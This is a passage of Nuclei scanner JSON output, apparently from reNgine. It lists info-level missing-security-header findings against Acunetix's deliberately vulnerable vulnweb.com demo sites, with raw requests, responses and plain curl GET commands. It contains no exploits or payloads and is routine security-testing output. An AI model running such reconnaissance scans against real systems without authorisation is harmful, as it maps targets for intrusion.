\\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:00.360854123Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:00.360875685Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:00.360884916Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:00.360904947Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:00.360894832Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:00.629996365Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers 